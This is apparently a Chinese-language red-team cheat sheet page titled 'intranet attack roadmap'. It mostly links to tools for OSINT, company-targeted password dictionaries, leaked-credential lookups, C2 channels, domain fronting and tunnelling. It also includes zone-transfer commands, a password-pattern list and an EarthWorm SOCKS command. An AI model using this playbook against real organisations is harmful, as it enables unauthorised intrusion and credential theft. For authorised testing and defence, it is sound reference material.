
<!DOCTYPE HTML>
<html lang="zh-hans" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>内网攻击路线图 · 网络安全大百科</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        <meta name="author" content="DarkN0te">
        
        
    
    <link rel="stylesheet" href="../gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-prism/prism-solarizedlight.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-search-pro/search.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-expandable-chapters/expandable-chapters.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-splitter/splitter.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-tbfed-pagefooter/footer.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-anchor-navigation-ex/style/plugin.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-fontsettings/website.css">
                
            
                
                <link rel="stylesheet" href="../gitbook/gitbook-plugin-theme-comscore/test.css">
                
            
        

    

    
        
        <link rel="stylesheet" href="../static/common.css">
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">

    
    
    <link rel="prev" href="./" />
    

    </head>
    <body>
        
<div class="book">

    <div class="book-body">
        
            <div class="body-inner">
                
                    





                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
<p>From: <a href="https://evi1cg.github.io" target="_blank">https://evi1cg.github.io</a></p>
<h1 id="&#x4FE1;&#x606F;&#x641C;&#x96C6;"><a name="&#x4FE1;&#x606F;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x4FE1;&#x606F;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4FE1;&#x606F;&#x641C;&#x96C6;</h1>
<h2 id="&#x5F00;&#x6E90;&#x60C5;&#x62A5;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#xFF08;osint&#xFF09;"><a name="&#x5F00;&#x6E90;&#x60C5;&#x62A5;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#xFF08;osint&#xFF09;" class="anchor-navigation-ex-anchor" href="#&#x5F00;&#x6E90;&#x60C5;&#x62A5;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#xFF08;osint&#xFF09;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5F00;&#x6E90;&#x60C5;&#x62A5;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#xFF08;OSINT&#xFF09;</h2>
<h3 id="github"><a name="github" class="anchor-navigation-ex-anchor" href="#github"><i class="fa fa-link" aria-hidden="true"></i></a>github</h3>
<ul>
<li>Github_Nuggests&#xFF08;&#x81EA;&#x52A8;&#x722C;&#x53D6;Github&#x4E0A;&#x6587;&#x4EF6;&#x654F;&#x611F;&#x4FE1;&#x606F;&#x6CC4;&#x9732;&#xFF09; :<a href="https://github.com/az0ne/Github_Nuggests" target="_blank">https://github.com/az0ne/Github_Nuggests</a></li>
<li>GSIL&#xFF08;&#x80FD;&#x591F;&#x5B9E;&#x73B0;&#x8FD1;&#x5B9E;&#x65F6;&#xFF08;15&#x5206;&#x949F;&#x5185;&#xFF09;&#x7684;&#x53D1;&#x73B0;Github&#x4E0A;&#x6CC4;&#x9732;&#x7684;&#x4FE1;&#x606F;&#xFF09; :<a href="https://github.com/FeeiCN/GSIL" target="_blank">https://github.com/FeeiCN/GSIL</a></li>
<li>x-patrol(&#x5C0F;&#x7C73;&#x56E2;&#x961F;&#x7684;):<a href="https://github.com/MiSecurity/x-patrol" target="_blank">https://github.com/MiSecurity/x-patrol</a></li>
</ul>
<h3 id="whois&#x67E5;&#x8BE2;&#x6CE8;&#x518C;&#x4EBA;&#x53CD;&#x67E5;&#x90AE;&#x7BB1;&#x53CD;&#x67E5;&#x76F8;&#x5173;&#x8D44;&#x4EA7;"><a name="whois&#x67E5;&#x8BE2;&#x6CE8;&#x518C;&#x4EBA;&#x53CD;&#x67E5;&#x90AE;&#x7BB1;&#x53CD;&#x67E5;&#x76F8;&#x5173;&#x8D44;&#x4EA7;" class="anchor-navigation-ex-anchor" href="#whois&#x67E5;&#x8BE2;&#x6CE8;&#x518C;&#x4EBA;&#x53CD;&#x67E5;&#x90AE;&#x7BB1;&#x53CD;&#x67E5;&#x76F8;&#x5173;&#x8D44;&#x4EA7;"><i class="fa fa-link" aria-hidden="true"></i></a>whois&#x67E5;&#x8BE2;/&#x6CE8;&#x518C;&#x4EBA;&#x53CD;&#x67E5;/&#x90AE;&#x7BB1;&#x53CD;&#x67E5;/&#x76F8;&#x5173;&#x8D44;&#x4EA7;</h3>
<ul>
<li>&#x7AD9;&#x957F;&#x4E4B;&#x5BB6;:<a href="http://whois.chinaz.com/?DomainName=target.com&amp;ws=" target="_blank">http://whois.chinaz.com/?DomainName=target.com&amp;ws=</a></li>
<li>&#x7231;&#x7AD9;:<a href="https://whois.aizhan.com/target.com/" target="_blank">https://whois.aizhan.com/target.com/</a></li>
<li>&#x5FAE;&#x6B65;&#x5728;&#x7EBF;:<a href="https://x.threatbook.cn/" target="_blank">https://x.threatbook.cn/</a></li>
<li>IP&#x53CD;&#x67E5;:<a href="https://dns.aizhan.com/" target="_blank">https://dns.aizhan.com/</a></li>
<li>&#x5929;&#x773C;&#x67E5;:<a href="https://www.tianyancha.com/" target="_blank">https://www.tianyancha.com/</a></li>
<li>&#x864E;&#x5988;&#x67E5;:<a href="http://www.whomx.com/" target="_blank">http://www.whomx.com/</a></li>
<li>&#x5386;&#x53F2;&#x6F0F;&#x6D1E;&#x67E5;&#x8BE2; :<ul>
<li>&#x5728;&#x7EBF;&#x67E5;&#x8BE2;:<a href="http://wy.zone.ci/" target="_blank">http://wy.zone.ci/</a></li>
<li>&#x81EA;&#x642D;&#x5EFA;:<a href="https://github.com/hanc00l/wooyun_publi/" target="_blank">https://github.com/hanc00l/wooyun_publi/</a></li>
</ul>
</li>
</ul>
<h3 id="google-hacking"><a name="google-hacking" class="anchor-navigation-ex-anchor" href="#google-hacking"><i class="fa fa-link" aria-hidden="true"></i></a>google hacking</h3>
<h2 id="&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;"><a name="&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;" class="anchor-navigation-ex-anchor" href="#&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x521B;&#x5EFA;&#x4F01;&#x4E1A;&#x5BC6;&#x7801;&#x5B57;&#x5178;</h2>
<h3 id="&#x5B57;&#x5178;&#x5217;&#x8868;"><a name="&#x5B57;&#x5178;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#&#x5B57;&#x5178;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5B57;&#x5178;&#x5217;&#x8868;</h3>
<ul>
<li>passwordlist:<a href="https://github.com/lavalamp-/password-lists" target="_blank">https://github.com/lavalamp-/password-lists</a></li>
<li>&#x732A;&#x732A;&#x4FA0;&#x5B57;&#x5178;:<a href="https://pan.baidu.com/s/1dFJyedz" target="_blank">https://pan.baidu.com/s/1dFJyedz</a>
<a href="https://github.com/rootphantomer/Blasting_dictionary" target="_blank">Blasting_dictionary</a>&#xFF08;&#x5206;&#x4EAB;&#x548C;&#x6536;&#x96C6;&#x5404;&#x79CD;&#x5B57;&#x5178;&#xFF0C;&#x5305;&#x62EC;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x5E38;&#x7528;&#x5BC6;&#x7801;&#xFF0C;&#x76EE;&#x5F55;&#x7206;&#x7834;&#xFF0C;&#x6570;&#x636E;&#x5E93;&#x7206;&#x7834;&#xFF0C;&#x7F16;&#x8F91;&#x5668;&#x7206;&#x7834;&#xFF0C;&#x540E;&#x53F0;&#x7206;&#x7834;&#x7B49;&#xFF09; </li>
<li>&#x9488;&#x5BF9;&#x7279;&#x5B9A;&#x7684;&#x5382;&#x5546;&#xFF0C;&#x91CD;&#x70B9;&#x6784;&#x9020;&#x5382;&#x5546;&#x76F8;&#x5173;&#x57DF;&#x540D;&#x7684;&#x5B57;&#x5178;<pre class="language-"><code>[&apos;%pwd%123&apos;,&apos;%user%123&apos;,&apos;%user%521&apos;,&apos;%user%2017&apos;,&apos;%pwd%321&apos;,&apos;%pwd%521&apos;,&apos;%user%321&apos;,&apos;%pwd%123!&apos;,&apos;%pwd%123!@#&apos;,&apos;%pwd%1234&apos;,&apos;%user%2016&apos;,&apos;%user%123$%^&apos;,&apos;%user%123!@#&apos;,&apos;%pwd%2016&apos;,&apos;%pwd%2017&apos;,&apos;%pwd%1!&apos;,&apos;%pwd%2@&apos;,&apos;%pwd%3#&apos;,&apos;%pwd%123#@!&apos;,&apos;%pwd%12345&apos;,&apos;%pwd%123$%^&apos;,&apos;%pwd%!@#456&apos;,&apos;%pwd%123qwe&apos;,&apos;%pwd%qwe123&apos;,&apos;%pwd%qwe&apos;,&apos;%pwd%123456&apos;,&apos;%user%123#@!&apos;,&apos;%user%!@#456&apos;,&apos;%user%1234&apos;,&apos;%user%12345&apos;,&apos;%user%123456&apos;,&apos;%user%123!&apos;]
</code></pre></li>
</ul>
<h3 id="&#x5BC6;&#x7801;&#x751F;&#x6210;"><a name="&#x5BC6;&#x7801;&#x751F;&#x6210;" class="anchor-navigation-ex-anchor" href="#&#x5BC6;&#x7801;&#x751F;&#x6210;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5BC6;&#x7801;&#x751F;&#x6210;</h3>
<ul>
<li>GenpAss&#xFF08;&#x4E2D;&#x56FD;&#x7279;&#x8272;&#x7684;&#x5F31;&#x53E3;&#x4EE4;&#x751F;&#x6210;&#x5668;&#xFF09;: <a href="https://github.com/RicterZ/genpAss/" target="_blank">https://github.com/RicterZ/genpAss/</a></li>
<li>passmaker&#xFF08;&#x53EF;&#x4EE5;&#x81EA;&#x5B9A;&#x4E49;&#x89C4;&#x5219;&#x7684;&#x5BC6;&#x7801;&#x5B57;&#x5178;&#x751F;&#x6210;&#x5668;&#xFF09; &#xFF1A;<a href="https://github.com/bit4woo/passmaker" target="_blank">https://github.com/bit4woo/passmaker</a></li>
<li>pydictor&#xFF08;&#x5F3A;&#x5927;&#x7684;&#x5BC6;&#x7801;&#x751F;&#x6210;&#x5668;&#xFF09; &#xFF1A;<a href="https://github.com/LandGrey/pydictor" target="_blank">https://github.com/LandGrey/pydictor</a></li>
</ul>
<h3 id="&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;"><a name="&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;" class="anchor-navigation-ex-anchor" href="#&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x90AE;&#x7BB1;&#x5217;&#x8868;&#x83B7;&#x53D6;</h3>
<ul>
<li>theHarvester &#xFF1A;<a href="https://github.com/laramies/theHarvester" target="_blank">https://github.com/laramies/theHarvester</a></li>
<li>&#x83B7;&#x53D6;&#x4E00;&#x4E2A;&#x90AE;&#x7BB1;&#x4EE5;&#x540E;&#x5BFC;&#x51FA;&#x901A;&#x8BAF;&#x5F55; </li>
<li>LinkedInt :<a href="https://github.com/mdsecactivebreach/LinkedInt" target="_blank">https://github.com/mdsecactivebreach/LinkedInt</a></li>
<li>Mailget&#xFF1A;<a href="https://github.com/Ridter/Mailget" target="_blank">https://github.com/Ridter/Mailget</a></li>
</ul>
<h3 id="&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;"><a name="&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;" class="anchor-navigation-ex-anchor" href="#&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6CC4;&#x9732;&#x5BC6;&#x7801;&#x67E5;&#x8BE2;</h3>
<ul>
<li>ghostproject: <a href="https://ghostproject.fr/" target="_blank">https://ghostproject.fr/</a></li>
<li>pwndb: <a href="https://pwndb2am4tzkvold.onion.to/" target="_blank">https://pwndb2am4tzkvold.onion.to/</a>（.onion.to 是 Tor2web 网关，查询内容会经第三方中转并可被记录；涉及敏感目标时请通过 Tor 直接访问 .onion 地址）</li>
</ul>
<h3 id="&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;"><a name="&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5BF9;&#x4F01;&#x4E1A;&#x5916;&#x90E8;&#x76F8;&#x5173;&#x4FE1;&#x606F;&#x8FDB;&#x884C;&#x641C;&#x96C6;</h3>
<h4 id="&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;"><a name="&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;" class="anchor-navigation-ex-anchor" href="#&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5B50;&#x57DF;&#x540D;&#x83B7;&#x53D6;</h4>
<ul>
<li>Layer&#x5B50;&#x57DF;&#x540D;&#x6316;&#x6398;&#x673A;4.2&#x7EAA;&#x5FF5;&#x7248; </li>
<li>subDomainsBrute &#xFF1A;<a href="https://github.com/lijiejie/subDomainsBrute" target="_blank">https://github.com/lijiejie/subDomainsBrute</a></li>
<li>wydomain &#xFF1A;<a href="https://github.com/ring04h/wydomain" target="_blank">https://github.com/ring04h/wydomain</a></li>
<li>Sublist3r &#xFF1A;<a href="https://github.com/aboul3la/Sublist3r" target="_blank">https://github.com/aboul3la/Sublist3r</a></li>
<li>site:target.com:<a href="https://www.google.com" target="_blank">https://www.google.com</a></li>
<li>Github&#x4EE3;&#x7801;&#x4ED3;&#x5E93; </li>
<li>&#x6293;&#x5305;&#x5206;&#x6790;&#x8BF7;&#x6C42;&#x8FD4;&#x56DE;&#x503C;(&#x8DF3;&#x8F6C;/&#x6587;&#x4EF6;&#x4E0A;&#x4F20;/app/api&#x63A5;&#x53E3;&#x7B49;) </li>
<li>&#x7AD9;&#x957F;&#x5E2E;&#x624B;links&#x7B49;&#x5728;&#x7EBF;&#x67E5;&#x8BE2;&#x7F51;&#x7AD9; </li>
<li>&#x57DF;&#x4F20;&#x9001;&#x6F0F;&#x6D1E; </li>
</ul>
<p>Linux</p>
<pre class="language-"><code>dig @ns.example.com example.com AXFR
</code></pre><p>Windows</p>
<pre class="language-"><code>nslookup -type=ns xxx.yyy.cn #&#x67E5;&#x8BE2;&#x89E3;&#x6790;&#x67D0;&#x57DF;&#x540D;&#x7684;DNS&#x670D;&#x52A1;&#x5668;
nslookup #&#x8FDB;&#x5165;nslookup&#x4EA4;&#x4E92;&#x6A21;&#x5F0F;
server dns.domain.com #&#x6307;&#x5B9A;dns&#x670D;&#x52A1;&#x5668;
ls xxx.yyy.cn #&#x5217;&#x51FA;&#x57DF;&#x4FE1;&#x606F;
</code></pre><ul>
<li>GetDomainsBySSL.py :<a href="https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&amp;type=note#/" target="_blank">https://note.youdao.com/ynoteshare1/index.html?id=247d97fc1d98b122ef9804906356d47a&amp;type=note#/</a></li>
<li>censys.io&#x8BC1;&#x4E66; :<a href="https://censys.io/certificates?q=target.com" target="_blank">https://censys.io/certificates?q=target.com</a></li>
<li>crt.sh&#x8BC1;&#x4E66;&#x67E5;&#x8BE2;:<a href="https://crt.sh/?q=%25.target.com" target="_blank">https://crt.sh/?q=%25.target.com</a></li>
<li>shodan :<a href="https://www.shodan.io/" target="_blank">https://www.shodan.io/</a></li>
<li>zoomeye :<a href="https://www.zoomeye.org/" target="_blank">https://www.zoomeye.org/</a></li>
<li>fofa :<a href="https://fofa.so/" target="_blank">https://fofa.so/</a></li>
<li>censys&#xFF1A;<a href="https://censys.io/" target="_blank">https://censys.io/</a></li>
<li>dnsdb.io :<a href="https://dnsdb.io/zh-cn/search?q=target.com" target="_blank">https://dnsdb.io/zh-cn/search?q=target.com</a></li>
<li>api.hackertarget.com :<a href="http://api.hackertarget.com/reversedns/?q=target.com" target="_blank">http://api.hackertarget.com/reversedns/?q=target.com</a></li>
<li>community.riskiq.com :<a href="https://community.riskiq.com/Search/target.com" target="_blank">https://community.riskiq.com/Search/target.com</a></li>
<li>subdomain3 :<a href="https://github.com/yanxiu0614/subdomain3" target="_blank">https://github.com/yanxiu0614/subdomain3</a></li>
<li>FuzzDomain :<a href="https://github.com/Chora10/FuzzDomain" target="_blank">https://github.com/Chora10/FuzzDomain</a></li>
<li>dnsdumpster.com :<a href="https://dnsdumpster.com/" target="_blank">https://dnsdumpster.com/</a></li>
<li>phpinfo.me :<a href="https://phpinfo.me/domain/" target="_blank">https://phpinfo.me/domain/</a></li>
<li>dns&#x5F00;&#x653E;&#x6570;&#x636E;&#x63A5;&#x53E3; :<a href="https://dns.bufferover.run/dns?q=baidu.com" target="_blank">https://dns.bufferover.run/dns?q=baidu.com</a></li>
</ul>
<h1 id="&#x8FDB;&#x5165;&#x5185;&#x7F51;"><a name="&#x8FDB;&#x5165;&#x5185;&#x7F51;" class="anchor-navigation-ex-anchor" href="#&#x8FDB;&#x5165;&#x5185;&#x7F51;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x8FDB;&#x5165;&#x5185;&#x7F51;</h1>
<h2 id="&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;"><a name="&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;" class="anchor-navigation-ex-anchor" href="#&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57FA;&#x4E8E;&#x4F01;&#x4E1A;&#x5F31;&#x8D26;&#x53F7;&#x6F0F;&#x6D1E;</h2>
<ul>
<li>VPN&#xFF08;&#x901A;&#x8FC7;&#x90AE;&#x7BB1;&#xFF0C;&#x5BC6;&#x7801;&#x7206;&#x7834;&#xFF0C;&#x793E;&#x5DE5;&#x7B49;&#x9014;&#x5F84;&#x83B7;&#x53D6;VPN&#xFF09; </li>
<li>&#x4F01;&#x4E1A;&#x76F8;&#x5173;&#x8FD0;&#x7EF4;&#x7CFB;&#x7EDF;&#xFF08;zabbix&#x7B49;&#xFF09; </li>
</ul>
<h2 id="&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;"><a name="&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;" class="anchor-navigation-ex-anchor" href="#&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57FA;&#x4E8E;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E;&#x8FDB;&#x5165;</h2>
<ul>
<li>Metasploit(&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x6846;&#x67B6;):<a href="https://github.com/rapid7/metasploit-framework" target="_blank">https://github.com/rapid7/metasploit-framework</a> </li>
<li>&#x6F0F;&#x6D1E;&#x5229;&#x7528;&#x811A;&#x672C; </li>
</ul>
<h2 id="&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;"><a name="&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7F51;&#x7AD9;&#x5E94;&#x7528;&#x7A0B;&#x5E8F;&#x6E17;&#x900F;</h2>
<ul>
<li>SQL&#x6CE8;&#x5165; </li>
<li>&#x8DE8;&#x7AD9;&#x811A;&#x672C;&#xFF08;XSS&#xFF09; </li>
<li>&#x8DE8;&#x7AD9;&#x8BF7;&#x6C42;&#x4F2A;&#x9020;&#xFF08;CSRF&#xFF09; </li>
<li>SSRF&#xFF08;<a href="https://github.com/bcoles/ssrf_proxy" target="_blank">ssrf_proxy</a>&#xFF09; </li>
<li>&#x529F;&#x80FD;/&#x4E1A;&#x52A1;&#x903B;&#x8F91;&#x6F0F;&#x6D1E; </li>
<li>&#x5176;&#x4ED6;&#x6F0F;&#x6D1E;&#x7B49; </li>
<li>CMS-&#x5185;&#x5BB9;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x6F0F;&#x6D1E; </li>
<li>&#x4F01;&#x4E1A;&#x81EA;&#x5EFA;&#x4EE3;&#x7406; </li>
</ul>
<h2 id="&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;"><a name="&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;" class="anchor-navigation-ex-anchor" href="#&#x65E0;&#x7EBF;wi-fi&#x63A5;&#x5165;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x65E0;&#x7EBF;Wi-Fi&#x63A5;&#x5165;</h2>
<h1 id="&#x9690;&#x533F;&#x653B;&#x51FB;"><a name="&#x9690;&#x533F;&#x653B;&#x51FB;" class="anchor-navigation-ex-anchor" href="#&#x9690;&#x533F;&#x653B;&#x51FB;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x9690;&#x533F;&#x653B;&#x51FB;</h1>
<h2 id="command-and-control"><a name="command-and-control" class="anchor-navigation-ex-anchor" href="#command-and-control"><i class="fa fa-link" aria-hidden="true"></i></a>Command and Control</h2>
<ul>
<li>ICMP :<a href="https://pentestlab.blog/2017/07/28/command-and-control-icmp/" target="_blank">https://pentestlab.blog/2017/07/28/command-and-control-icmp/</a></li>
<li>DNS :<a href="https://pentestlab.blog/2017/09/06/command-and-control-dns/" target="_blank">https://pentestlab.blog/2017/09/06/command-and-control-dns/</a></li>
<li>DropBox :<a href="https://pentestlab.blog/2017/08/29/command-and-control-dropbox/" target="_blank">https://pentestlab.blog/2017/08/29/command-and-control-dropbox/</a></li>
<li>Gmail :<a href="https://pentestlab.blog/2017/08/03/command-and-control-gmail/" target="_blank">https://pentestlab.blog/2017/08/03/command-and-control-gmail/</a></li>
<li>Telegram :<a href="http://drops.xmd5.com/static/drops/tips-16142.html" target="_blank">http://drops.xmd5.com/static/drops/tips-16142.html</a></li>
<li>Twitter :<a href="https://pentestlab.blog/2017/09/26/command-and-control-twitter/" target="_blank">https://pentestlab.blog/2017/09/26/command-and-control-twitter/</a></li>
<li>Website Keyword :<a href="https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/" target="_blank">https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/</a></li>
<li>PowerShell :<a href="https://pentestlab.blog/2017/08/19/command-and-control-powershell/" target="_blank">https://pentestlab.blog/2017/08/19/command-and-control-powershell/</a></li>
<li>Windows COM :<a href="https://pentestlab.blog/2017/09/01/command-and-control-windows-com/" target="_blank">https://pentestlab.blog/2017/09/01/command-and-control-windows-com/</a></li>
<li>WebDAV :<a href="https://pentestlab.blog/2017/09/12/command-and-control-webdav/" target="_blank">https://pentestlab.blog/2017/09/12/command-and-control-webdav/</a></li>
<li>Office 365 :<a href="https://www.anquanke.com/post/id/86974" target="_blank">https://www.anquanke.com/post/id/86974</a></li>
<li>HTTPS :<a href="https://pentestlab.blog/2017/10/04/command-and-control-https/" target="_blank">https://pentestlab.blog/2017/10/04/command-and-control-https/</a></li>
<li>Kernel :<a href="https://pentestlab.blog/2017/10/02/command-and-control-kernel/" target="_blank">https://pentestlab.blog/2017/10/02/command-and-control-kernel/</a></li>
<li>Website :<a href="https://pentestlab.blog/2017/11/14/command-and-control-website/" target="_blank">https://pentestlab.blog/2017/11/14/command-and-control-website/</a></li>
<li>WMI :<a href="https://pentestlab.blog/2017/11/20/command-and-control-wmi/" target="_blank">https://pentestlab.blog/2017/11/20/command-and-control-wmi/</a></li>
<li>WebSocket :<a href="https://pentestlab.blog/2017/12/06/command-and-control-websocket/" target="_blank">https://pentestlab.blog/2017/12/06/command-and-control-websocket/</a></li>
<li>Images :<a href="https://pentestlab.blog/2018/01/02/command-and-control-images/" target="_blank">https://pentestlab.blog/2018/01/02/command-and-control-images/</a></li>
<li>Web Interface :<a href="https://pentestlab.blog/2018/01/03/command-and-control-web-interface/" target="_blank">https://pentestlab.blog/2018/01/03/command-and-control-web-interface/</a></li>
<li>JavaScript :<a href="https://pentestlab.blog/2018/01/08/command-and-control-javascript/" target="_blank">https://pentestlab.blog/2018/01/08/command-and-control-javascript/</a></li>
<li>... </li>
</ul>
<h2 id="fronting"><a name="fronting" class="anchor-navigation-ex-anchor" href="#fronting"><i class="fa fa-link" aria-hidden="true"></i></a>Fronting</h2>
<ul>
<li><a href="https://evi1cg.me/archives/Domain_Fronting.html" target="_blank">Domain Fronting </a></li>
<li><a href="https://evi1cg.me/archives/Tor_Fronting.html" target="_blank">Tor Fronting</a></li>
</ul>
<h2 id="&#x4EE3;&#x7406;"><a name="&#x4EE3;&#x7406;" class="anchor-navigation-ex-anchor" href="#&#x4EE3;&#x7406;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4EE3;&#x7406;</h2>
<ul>
<li>VPN </li>
<li>shadowsocks :<a href="https://github.com/shadowsocks" target="_blank">https://github.com/shadowsocks</a></li>
<li>HTTP :<a href="http://cn-proxy.com/" target="_blank">http://cn-proxy.com/</a>（公开 HTTP 代理可以查看、记录甚至篡改经过它的明文流量，只用于非敏感访问，不要通过它传递凭据）</li>
<li>Tor </li>
</ul>
<h1 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x5E94;&#x7528;</h1>
<h2 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x8F6C;&#x53D1;</h2>
<ul>
<li><a href="https://blog.csdn.net/l_f0rm4t3d/article/details/24004555" target="_blank">NC&#x7AEF;&#x53E3;&#x8F6C;&#x53D1;</a> </li>
<li><a href="http://blog.chinaunix.net/uid-53401-id-4407931.html" target="_blank">LCX&#x7AEF;&#x53E3;&#x8F6C;&#x53D1; </a></li>
<li><a href="https://github.com/cnlh/nps" target="_blank">nps</a></li>
<li>&#x4EE3;&#x7406;&#x811A;&#x672C; <ol>
<li><a href="https://github.com/SECFORCE/Tunna" target="_blank">Tunna </a></li>
<li><a href="https://github.com/sensepost/reDuh" target="_blank">Reduh </a></li>
</ol>
</li>
<li>... </li>
</ul>
<h2 id="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;"><a name="&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x8DE8;&#x8FB9;&#x754C;&#x4EE3;&#x7406;&#x7A7F;&#x900F;</h2>
<h3 id="ew"><a name="ew" class="anchor-navigation-ex-anchor" href="#ew"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://rootkiter.com/EarthWorm/" target="_blank">EW</a></h3>
<p>&#x6B63;&#x5411; SOCKS v5 &#x670D;&#x52A1;&#x5668;:</p>
<pre class="language-"><code>./ew -s ssocksd -l 1080
